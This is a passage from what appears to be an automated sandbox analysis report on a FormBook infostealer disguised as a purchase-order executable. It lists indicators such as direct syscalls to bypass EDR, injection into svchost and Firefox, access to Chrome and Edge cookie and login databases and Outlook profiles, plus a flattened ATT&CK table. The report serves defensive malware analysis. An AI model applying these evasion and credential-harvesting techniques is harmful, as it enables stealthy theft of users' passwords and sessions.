            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03056962 mov eax, dword ptr fs:[00000030h]1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov edx, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0307096E mov eax, dword ptr fs:[00000030h]1_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4978 mov eax, dword ptr fs:[00000030h]1_2_030D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC97C mov eax, dword ptr fs:[00000030h]1_2_030BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030429A0 mov eax, dword ptr fs:[00000030h]1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030309AD mov eax, dword ptr fs:[00000030h]1_2_030309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov esi, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B89B3 mov eax, dword ptr fs:[00000030h]1_2_030B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C69C0 mov eax, dword ptr fs:[00000030h]1_2_030C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A9D0 mov eax, dword ptr fs:[00000030h]1_2_0303A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030649D0 mov eax, dword ptr fs:[00000030h]1_2_030649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA9D3 mov eax, dword ptr fs:[00000030h]1_2_030FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE9E0 mov eax, dword ptr fs:[00000030h]1_2_030BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030629F9 mov eax, dword ptr fs:[00000030h]1_2_030629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC810 mov eax, dword ptr fs:[00000030h]1_2_030BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov ecx, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03052835 mov eax, dword ptr fs:[00000030h]1_2_03052835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A830 mov eax, dword ptr fs:[00000030h]1_2_0306A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D483A mov eax, dword ptr fs:[00000030h]1_2_030D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03042840 mov ecx, dword ptr fs:[00000030h]1_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060854 mov eax, dword ptr fs:[00000030h]1_2_03060854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034859 mov eax, dword ptr fs:[00000030h]1_2_03034859
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002DA937 GetProcessHeap,0_2_002DA937
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D8E3C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D8E19 SetUnhandledExceptionFilter,0_2_002D8E19

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread register set: target process: 7704Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeThread APC queued: target process: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D0008Jump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EBE95 LogonUserW,0_2_002EBE95
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_002B374E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F4B52 SendInput,keybd_event,0_2_002F4B52
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002F7DD5 mouse_event,0_2_002F7DD5
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"Jump to behavior
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_002EB398
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_002EBE31
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: ZQphKCYQofBW.exe, 00000002.00000002.3541130484.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000000.1799456292.0000000000C90000.00000002.00000001.00040000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945388524.0000000001841000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D7254 cpuid 0_2_002D7254
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002D40DA GetSystemTimeAsFileTime,__aulldiv,0_2_002D40DA
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_0032C146 GetUserNameW,0_2_0032C146
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002E2C3C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_002CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002CE47B

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_81
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_XP
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_XPe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_VISTA
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_7
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_003091DC
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exeCode function: 0_2_003096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_003096E2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
